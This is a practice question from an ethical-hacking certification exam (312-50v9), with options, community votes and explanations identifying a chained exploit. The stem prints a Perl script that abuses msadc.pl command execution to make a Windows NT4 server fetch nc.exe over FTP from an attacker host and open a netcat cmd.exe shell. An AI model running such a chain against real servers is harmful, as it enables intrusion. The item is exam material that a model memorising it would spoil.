312-50V9 · Question #76
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On furth
The correct answer is B. A chained exploit. The script demonstrates a chained exploit by linking multiple sequential msadc.pl calls to build an FTP command file and then use it to download additional attack tools.
Question
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:
system("perl msadc.pl -h $host -C "echo open $your >testfile""); system("perl msadc.pl -h $host -C "echo $user>>testfile""); system("perl msadc.pl -h $host -C "echo $pass>>testfile""); system("perl msadc.pl -h $host -C "echo bin>>testfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>testfile""); system("perl msadc.pl -h $host -C "echo get hacked.html>>testfile""); ("perl msadc.pl -h $host -C "echo quit>>testfile""); system("perl msadc.pl -h $host -C "ftp -s:testfile""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); Which exploit is indicated by this script?
Options
- AA buffer overflow exploit
- BA chained exploit
- CA SQL injection exploit
- DA denial of service exploit
How the community answered
(15 responses)- A7% (1)
- B73% (11)
- C7% (1)
- D13% (2)
Why each option
The script demonstrates a chained exploit by linking multiple sequential msadc.pl calls to build an FTP command file and then use it to download additional attack tools.
A buffer overflow exploit overwrites adjacent memory to hijack execution flow, which is not demonstrated anywhere in this script.
A chained exploit combines multiple individual techniques or vulnerabilities in sequence to achieve a goal that none could accomplish alone. Here, the attacker chains repeated msadc.pl remote command executions to incrementally write an FTP script file ('testfile'), then invokes FTP with that script to pull down nc.exe and hacked.html - each step depending on the prior one to succeed.
A SQL injection exploit manipulates database query strings to extract or modify data, and no SQL statements or database interactions appear in this script.
A denial of service exploit floods a target with traffic or requests to make it unavailable, whereas this script is focused on gaining remote code execution and downloading files.
Concept tested: Chained exploit technique using sequential remote commands
Source: https://csrc.nist.gov/glossary/term/exploit
Topics
Community Discussion
No community discussion yet for this question.